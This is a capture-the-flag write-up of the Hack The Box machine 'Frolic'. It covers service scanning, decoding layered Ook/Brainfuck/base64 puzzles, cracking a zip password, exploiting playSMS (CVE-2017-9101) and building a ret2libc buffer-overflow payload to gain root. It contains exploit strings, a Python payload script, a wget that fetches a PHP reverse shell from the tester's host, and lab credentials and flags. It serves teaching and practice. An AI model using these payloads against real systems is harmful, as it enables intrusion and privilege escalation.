Skip to content
Permalink
ba79a00c20
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
title tags
Frolic
Linux, Encoding

Recon

Getting a bit more wise to how this works, so simulatinously visit the web while I start the basic Nmap scanning. However, Interesting, doesnt have a HTTP interface, so I have to hang about waiting on the scan.

NMAP

dang@dang-laptop ~/Documents/HTB$ nmap -sV 10.10.10.111                                                             
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:30 GMT
Nmap scan report for 10.10.10.111
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds

We can visit port 9999 and discuver wha we have an nginx server so it does after all.

dang@dang-laptop ~$ nmap -A 10.10.10.111                                                                            Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 21:01 GMT
Nmap scan report for 10.10.10.111
Host is up (0.051s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
|   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
|_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
9999/tcp open  http        nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1h48m40s, deviation: 3h10m30s, median: 1m18s
|_nbstat: NetBIOS name: FROLIC, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: frolic
|   NetBIOS computer name: FROLIC\x00
|   Domain name: \x00
|   FQDN: frolic
|_  System time: 2019-03-05T02:32:43+05:30
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-03-04 21:02:42
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds
dang@dang-laptop ~$  

HTTP Enumeration

Port 9999 is standard page.

Nikto

root@kali:~# nikto -host 10.10.10.111 -port 9999
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.111
+ Target Hostname:    10.10.10.111
+ Target Port:        9999
+ Start Time:         2019-03-05 15:24:48 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x5ba78110 0x27d 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /backup/: This might be interesting...
+ /test/: Output from the phpinfo() function was found.
+ OSVDB-3092: /test/: This might be interesting...
+ /test/index.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /test/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ /admin/index.html: Admin login page/section found.
+ 7501 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2019-03-05 15:28:50 (GMT0) (242 seconds)
---------------------------------------------------------------------

Dirbuster

Dirbuster found

  • test/
  • backup/
Dir found: /test/ - 200
File found: /test/index.php - 200
Dir found: /admin/css/ - 403
Dir found: /dev/ - 403
Dir found: /admin/js/ - 403
Dir found: /backup/ - 200
File found: /backup/index.php - 200
Dir found: /dev/backup/ - 200
File found: /dev/backup/index.php - 200

 - Dir found: /loop/ - 403
Dir found: /backup/loop/ - 403
Dir found: /loop/loop/ - 403
Dir found: /backup/loop/loop/ - 403
Dir found: /loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/ - 403
Dir found: /loop/loop/loop/loop/ - 403
Dir found: /backup/loop/loop/loop/loop/ - 403

Inside dev/backup we find /playsms Inside backup we get a username and password

  • admin:imnothuman

WHICH TURN OUT TO BE SMB CREDS!! However, that lead me a "merry chase" down the SMB, rabithole.

Coninuing the HTTP Enum

Admin directory lives us a login page.

  • Source shows admin and superduperlooperpassword_lol

Presents http://10.10.10.111:9999/admin/success.html

Which is

..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?. 

NOTE: Got a bit stuck here, Looking on the Froums, this looks like it could be BLurb or Ook (Is a Brainfuck Derivitive, and there is a clue about fish)

Converting the code (small python script perpend Ook to each argument, then run through a onine Ook parser we end up with..

Nothing here check /asdiSIAJJ0QWE9JAS

NOTE: This is where I discovered Cyberchef. Bloody godsend given that next bit is all about decoding a silly number of times.

Navigating there gives us a second message.

UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA

Which with a bit of Faffing, turns out to be a zip file encoded with base 64.

  • Which is password encoded.

WE make use of fcrackzip

user@kali:~$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip 

PASSWORD FOUND!!!!: pw == password
user@kali:~$ 

Now we get an index.php file

4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

Which if we convert to ASCII -> Then Base64 we end up with Brainfuck

Which then translates to

idkwhatispass

This works as creds (with admin) on http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_welcome

Play SMS Exploit

https://amonsec.net/ctf/dina-ctf-walkthrough https://www.exploit-db.com/exploits/42003/

Getting User

Grab a script from https://github.com/jasperla/CVE-2017-9101 $ python playsms.py --url http://10.10.10.111:9999/playsms -i

And I gets user

> cat /home/ayush/user.txt
<Response [200]>
2ab95909cf509f85a6f476b59a0c2fe0

Getting Root.

Standard Enumeration, Look for suid files. This time we find

-rwsr-xr-x 1 root root 7480 Sep 25 00:59 /home/ayush/.binary/rop

ROP, sounds like a clue.

Trying the exploit on my machine

We can copy that acoss by copying to the www directoy, then download.

Seems like we have an overflow with some ROP based programming, so I can follow along with this

https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-october/

First Step, determine the buffer overflow

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A' * 1000"`

Or in GDB

Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 56"`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) 

Looks like Grap EIP at 52 Bytes

Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 52 + 'BBBB'"`

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) 

We want to follow the basic ROP techingqye of <System><Exit></Bin/sh> These will live in libc so we need to find them

We also know tat they are offset from libc...

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc                                                
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7dad000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc                                                
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7d15000)
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc                                                
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7d14000)
(env) dang@dang-laptop ~/Docume

This is moving around so lets (Note: To start off with I want to make my life easy, so lets diable ALSR)

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ cat /proc/sys/kernel/randomize_va_space                              
2
(env) dang@dang-laptop ~/Documents/HTB/Frolic$ sudo sysctl kernel.randomize_va_space=0   

Which means Libc is now at 0x7fdc4000

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc                                           1 ↵  
        libc.so.6 => /usr/lib32/libc.so.6 (0xf7dc4000)

Lets grab System from libc (NOTE: Dont be a Dick, check the address of Libc)

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep system                         
   257: 0012adb0   102 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@GLIBC_2.0
   657: 0003e8f0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1524: 0003e8f0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
   569: 00000000     0 FILE    LOCAL  DEFAULT  ABS system.c
   570: 0003e3f0  1071 FUNC    LOCAL  DEFAULT   13 do_system
  5335: 0012adb0   102 FUNC    LOCAL  DEFAULT   13 __GI_svcerr_systemerr
  6792: 0012adb0   102 FUNC    LOCAL  DEFAULT   13 __EI_svcerr_systemerr
  7434: 0003e8f0    55 FUNC    WEAK   DEFAULT   13 system
  7486: 0012adb0   102 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@GLIBC_2.
  8144: 0003e8f0    55 FUNC    GLOBAL DEFAULT   13 __libc_system
(env) dang@dang-laptop ~/Documents/HTB/Frolic$  

== 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0

Exit

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep exit                           
   121: 00031db0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   150: 000318e0    33 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0

And find a call to /bin/sh

dang@dang-laptop ~/Documents/HTB/Frolic$ strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh
 17faaa /bin/sh

As these are offset we need to calculate with regard to Libc Address

  • Libc 0xf7dc4000

  • System 0x45380

  • Exit 0x3a570

  • /bin/sh 0x17faaa

|------|------------|-------------| | Sys | 0xf7e028f0 | f7 e0 28 f0 | | Exit | 0xf7df58e0 | f7 df 58 e0 | | Sh | 0xf7f43aaa | f7 f4 3a aa |

Therefore our overflow becomes <52><System><ecit><bin/sh>

or (Rember Endianness)

```python2 -c "print 'A'*52+'\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\xba\xfb\xf7'"``

Which gives me an error of nsorted not found...

(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\x19\x85\xf4\xf7' + 'C'*50"` 
sh: nsorted: command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X���CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% 

NOTE: Ended up doing this again in GDB. Turns out I was calling out to the wrong version of glibc. Live and Learn :(

Thying the ROP chain in GDB

So I can work out what is happeing..

Confirm that we control EIP

(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"

Find the call to system and Exit (Which match our other ones)

Breakpoint 1 at 0x80484aa
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`

Breakpoint 1, 0x080484aa in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e028f0 <system>
(gdb) 

(gdb) p exit
$2 = {<text variable, no debug info>} 0xf7df58e0 <exit>
(gdb) 

We could then confirm we hit system (at least)

(gdb) break system
Breakpoint 2 at 0xf7e028f0

Without the Mangled Address

(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"`

Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) continue
Continuing.

Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
(gdb) 

And With It

(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"`

Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.

Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30400]
sh: $'4\325\377\377X\325\377\377': command not found

Program received signal SIGSEGV, Segmentation fault.
0xffffd500 in ?? ()
(gdb) 

Adding Exit

Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7'"`

Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.

Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30405]
sh: $'\323\377\377': command not found
[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X�[Inferior 1 (process 30403) exited with code 0300]
(gdb) 

And grabbing SH from where we guessed it would be.

f7 f4 3a aa

(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"`

Breakpoint 1, 0x080484aa in main ()
(gdb) continue
Continuing.

Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6
(gdb) continue
Continuing.
[Detaching after fork from child process 30938]
sh-5.0$ 

WOOT!!!

Rooting the Box

Firstly the Shell I have been using is a bit fraught, Replace it the the PHP reverse shell to see if that behaves better.

Pentest Monkey php reverse shell, Fire up a python webserver and

> wget 10.10.14.251:8000/dangPayload.php -O plugin/dangPayload.php
<Response [200]>

Things behave a bit better.

Nice that ALSR is turned off

$ cat /proc/sys/kernel/randomize_va_space
0

Lets also copy a local version across so I can play without screwing up the main binary.

cp /home/ayush/.binary/rop rop

Confirm offset of libc

$ ldd rop | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$ ldd rop | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$ 
$ ldd /home/ayush/.binary/rop | grep libc
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
$ 

System

$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
$ 

Exit

$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
   112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0

And SH

$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
 15ba0b /bin/sh
$ 

Offset Notes

  • Libc /lib/i386-linux-gnu/libc.so.6 0xb7e19000
  • System: 0x0003ada0
  • Exit: 0x0002e9d0
  • Bin Sh: 0x15ba0b

From the Offset Calc Script

|------------|------|----------| | 0xb7e53da0 | 0xb7 | e5 3d a0 | | 0xb7e479d0 | 0xb7 | e4 79 d0 | | 0xb7f74a0b | 0xb7 | f7 4a 0b |

So Payload is

python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'"

We can try this though it doesnt help

$ ltrace ./dangrop `python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7\xd0\x79\xe4\xb7\x0b\x4a\xf7\xb7'"`
Segmentation fault (core dumped)
$ 

strace ./dangrop python2 -c "print 'A'*52+'B'"

Which I think Gives me what I need as I can confirm EIP.

--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
www-data@frolic:/tmp/dg$ 

Yet more Faffing for Root!!!

Had to write a script to do the calcs as I was evidently screting something up

#Set of Libary
"""
- System: 0x0003ada0
- Exit: 0x0002e9d0
- Bin Sh:  0x15ba0b
"""

LIBC = 0xb7e19000

SYSTEM = 0x3ada0
EXIT = 0x2e9d0
SH = 0x15ba0b

sysoffset = LIBC + SYSTEM
exitoffset = LIBC + EXIT
shoffset = LIBC + SH

#print (hex(sysoffset))
#print (hex(exitoffset))
#print (hex(shoffset))

import struct

out = "A"*52
out += struct.pack("<I",LIBC+SYSTEM)
out += struct.pack("<I",LIBC+EXIT)
out += struct.pack("<I",LIBC+SH)

print out
$ /home/ayush/.binary/rop `python2 calcoffsets.py`
/home/ayush/.binary/rop `python2 calcoffsets.py`
# whoami
###whoami
###root
# cd /root
# cat root.txt
####cat root.txt
####85d3fdf03f969892538ba9a731826222

The Rabbit Hole of SMB Enumeration (RABBIT)

  • Enum users comes back empty
user@MarbleArch ~ % smbmap -H 10.10.10.111
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.111...
[+] IP: 10.10.10.111:445        Name: 10.10.10.111                                      
        Disk                                                    Permissions
        ----                                                    -----------
        print$                                                  NO ACCESS
        IPC$                                                    NO ACCESS
user@MarbleArch ~ % 
127 user@MarbleArch ~ % nmap --script smb-enum-shares -p 139,445 10.10.10.111                                                                                                                                                               :(
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-01 08:51 GMT
Nmap scan report for 10.10.10.111
Host is up (0.025s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.111\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (frolic server (Samba, Ubuntu))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.111\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds
user@MarbleArch ~ % 

Manually checking

First lets enumerate the shares...

user@kali:~$ smbclient -L 10.10.10.111 -n
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\user's password: 
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (frolic server (Samba, Ubuntu))
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            
user@kali:~$ 

So the shares with need permissions

WE can check with (Print is locked down)

user@kali:~$ smbclient //10.10.10.111/IPC$ -N
WARNING: The "syslog" option is deprecated
OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]
smb: \>